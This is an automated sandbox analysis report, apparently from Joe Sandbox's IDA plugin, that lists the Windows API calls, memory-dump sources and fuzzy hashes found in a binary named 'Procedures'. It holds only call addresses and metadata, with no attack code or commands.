                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00EAC85F
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1120388591-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(00000035), ref: 00E800A9
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00E80150
                                                                                                                                                                                                                                                                                                    • VariantCopy.OLEAUT32(00E80354,00000000), ref: 00E80179
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(00E80354), ref: 00E8019D
                                                                                                                                                                                                                                                                                                    • VariantCopy.OLEAUT32(00E80354,00000000), ref: 00E801A1
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00E801AB
                                                                                                                                                                                                                                                                                                    Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3859894641-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E241EA: _wcslen.LIBCMT ref: 00E241EF
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E28577: _wcslen.LIBCMT ref: 00E2858A
                                                                                                                                                                                                                                                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00E99F2A
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E99F4B
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E99F72
                                                                                                                                                                                                                                                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00E99FCA
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                                                                                                                                                    • String ID: X
                                                                                                                                                                                                                                                                                                    • API String ID: 83654149-3081909835
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E96F21
                                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00E9707E
                                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00EC0CC4,00000000,00000001,00EC0B34,?), ref: 00E97095
                                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00E97319
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: .lnk
                                                                                                                                                                                                                                                                                                    • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00E911B3
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00E911EE
                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00E9120A
                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00E91283
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00E9129A
                                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E912C8
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3368777196-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 814de960cda83008887bbd28d8720f954191fa0f814abd68c7ea04d61098c96a
                                                                                                                                                                                                                                                                                                    • Instruction ID: c1d03e3f575122376a261d5201817e24870e93ca8f8a65fd360403902e179a9b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 814de960cda83008887bbd28d8720f954191fa0f814abd68c7ea04d61098c96a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4415C71901205EFDF05AF95EC85AAAB7B8FF04314F1440A5EE00AB2A6DB30DE55DBA0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00E7FBEF,00000000,?,?,00000000,?,00E639E2,00000004,00000000,00000000), ref: 00EB8CA7
                                                                                                                                                                                                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 00EB8CCD
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00EB8D2C
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00EB8D40
                                                                                                                                                                                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00EB8D66
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00EB8D8A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 642888154-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 67e418493bf0ab8f9e30e33ae76ce24d15fc2302b2130ab1fe45ed021df3c4e6
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5f7e34e5e4a39958d2f803bcaa5651e15d202979b738fcf7c9ed1da824b2259e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67e418493bf0ab8f9e30e33ae76ce24d15fc2302b2130ab1fe45ed021df3c4e6
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75419370601244AFDB25DF24CA95BE27FF9FB85308F1451A9E6087B3A2CB716849CF51
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 00EA2D45
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E9EF33: GetWindowRect.USER32(?,?), ref: 00E9EF4B
                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00EA2D6F
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00EA2D76
                                                                                                                                                                                                                                                                                                    • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00EA2DB2
                                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00EA2DDE
                                                                                                                                                                                                                                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00EA2E3C
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2387181109-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 83c916512de1a01d13cd449efe57c93173167b4fd32446af56a1f74b36eb51ed
                                                                                                                                                                                                                                                                                                    • Instruction ID: a9ee0695d5b020fc227c8b95df9a95a80d4baf04f199fb5a13fcec4cb8426ac2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83c916512de1a01d13cd449efe57c93173167b4fd32446af56a1f74b36eb51ed
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B331B072509315AFC720DF189C45B9BB7A9FB89354F001A1EF589BB191DA30E9098BE2
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 00E855F9
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E85616
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E8564E
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E8566C
                                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E85674
                                                                                                                                                                                                                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00E8567E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 72514467-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 649b21725ec19f8ae1090c1ba745d17cefb3431041ace0925dc2f9f80d574176
                                                                                                                                                                                                                                                                                                    • Instruction ID: a46d38a42c1a1b3fa1c861912d6d3fb01e66296ead00709bfd31084ff14520f0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 649b21725ec19f8ae1090c1ba745d17cefb3431041ace0925dc2f9f80d574176
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4021F273604600BBEB166B25AC49E7B7BE8DF44720F14507AF90DEA191FE61C841A760
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E25851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E255D1,?,?,00E64B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E25871
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E962C0
                                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00E963DA
                                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00EC0CC4,00000000,00000001,00EC0B34,?), ref: 00E963F3
                                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00E96411
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: .lnk
                                                                                                                                                                                                                                                                                                    • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00E436E9,00E43355), ref: 00E43700
                                                                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E4370E
                                                                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E43727
                                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00E436E9,00E43355), ref: 00E43779
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00E44D53,00000000,?,?,00E468E2,?,?,00000000), ref: 00E530EB
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E5311E
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E53146
                                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000), ref: 00E53153
                                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000), ref: 00E5315F
                                                                                                                                                                                                                                                                                                    • _abort.LIBCMT ref: 00E53165
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E21F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E21F87
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E21F2D: SelectObject.GDI32(?,00000000), ref: 00E21F96
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E21F2D: BeginPath.GDI32(?), ref: 00E21FAD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E21F2D: SelectObject.GDI32(?,00000000), ref: 00E21FD6
                                                                                                                                                                                                                                                                                                    • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00EB94AA
                                                                                                                                                                                                                                                                                                    • LineTo.GDI32(?,00000003,00000000), ref: 00EB94BE
                                                                                                                                                                                                                                                                                                    • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00EB94CC
                                                                                                                                                                                                                                                                                                    • LineTo.GDI32(?,00000000,00000003), ref: 00EB94DC
                                                                                                                                                                                                                                                                                                    • EndPath.GDI32(?), ref: 00EB94EC
                                                                                                                                                                                                                                                                                                    • StrokePath.GDI32(?), ref: 00EB94FC
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 43455801-0
APIs
• GetDC.USER32(00000000), ref: 00E85B7C
• GetDeviceCaps.GDI32(00000000,00000058), ref: 00E85B8D
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E85B94
• ReleaseDC.USER32(00000000,00000000), ref: 00E85B9C
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 00E85BB3
• MulDiv.KERNEL32(000009EC,00000001,?), ref: 00E85BC5
Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E232AF
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00E232B7
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E232C2
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E232CD
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00E232D5
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00E232DD
Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E8F447
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E8F45D
• GetWindowThreadProcessId.USER32(?,?), ref: 00E8F46C
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E8F47B
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E8F485
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E8F48C
Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
APIs
• GetClientRect.USER32(?), ref: 00E634EF
• SendMessageW.USER32(?,00001328,00000000,?), ref: 00E63506
• GetWindowDC.USER32(?), ref: 00E63512
• GetPixel.GDI32(00000000,?,?), ref: 00E63521
• ReleaseDC.USER32(?,00000000), ref: 00E63533
• GetSysColor.USER32(00000005), ref: 00E6354D
Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
Similarity
• API ID: ClientColorMessagePixelRectReleaseSendWindow
• String ID:
• API String ID: 272304278-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 72291cf04bfbc79c58245d59050d3c55fdfb3e80e57bc68da6e820dbcf40802e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 40414e81b78af4edbbb3b674c5234ff9b6ea50dc8e702b55d288031c464cae52
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72291cf04bfbc79c58245d59050d3c55fdfb3e80e57bc68da6e820dbcf40802e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE012431505215EFDB615BA6EC08BEA7BB6FB48321F500264FA1AB21A1EB311E55AF10
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E821CC
                                                                                                                                                                                                                                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 00E821D8
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00E821E1
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00E821E9
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00E821F2
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00E821F9
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 146765662-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 01ebc5e3e0f7fb31979f387e996800f7541dd47f0b29dd79207dd6da6759efee
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6bcf02c9b26f08890f54036bd90d8fc52b492cfc1b77c6d41ed052b98b6d6fa7
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 01ebc5e3e0f7fb31979f387e996800f7541dd47f0b29dd79207dd6da6759efee
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02E0C2B600C105BFDB011BE6EC0C94ABF69FB49322B104321F225E2070EB329424DB50
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00EAB903
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E241EA: _wcslen.LIBCMT ref: 00E241EF
                                                                                                                                                                                                                                                                                                    • GetProcessId.KERNEL32(00000000), ref: 00EAB998
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00EAB9C7
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: <$@
                                                                                                                                                                                                                                                                                                    • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                                                                                    • Opcode ID: 836f4dea72695c86a0c5dfb2363c335677559366089e44e4b093abe32a3ebac4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9c42f0c7ba23353cfd4921f549d6ed8c0bd3a37816fff420fd195fa8e85ddfb1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 836f4dea72695c86a0c5dfb2363c335677559366089e44e4b093abe32a3ebac4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E715575A00229DFCB14EF64D894A9EBBF4FF09304F049499E856BB392CB34AD45CB90
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EB48D1
                                                                                                                                                                                                                                                                                                    • IsMenu.USER32(?), ref: 00EB48E6
                                                                                                                                                                                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EB492E
                                                                                                                                                                                                                                                                                                    • DrawMenuBar.USER32 ref: 00EB4941
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                                    • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                                                                                    • Opcode ID: 7d0828ed071785eb8f4c4eb78c44432eab3995cf781cf1cd77ba3767f4910042
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8f937a8e17f456ff0365b99e22fa4e17b139c155e8bf6635ae92ab4fffb05f1f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d0828ed071785eb8f4c4eb78c44432eab3995cf781cf1cd77ba3767f4910042
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77414BB5A0124AEFDB20CF51D884AEBBBB5FF45328F045129F945A72A1D730AD54CB60
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E84620
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E827B3
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E827C6
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E827F6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E28577: _wcslen.LIBCMT ref: 00E2858A
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                    • API String ID: 2081771294-1403004172
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00EB3A29
                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00EB3A30
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00EB3A45
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00EB3A4D
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
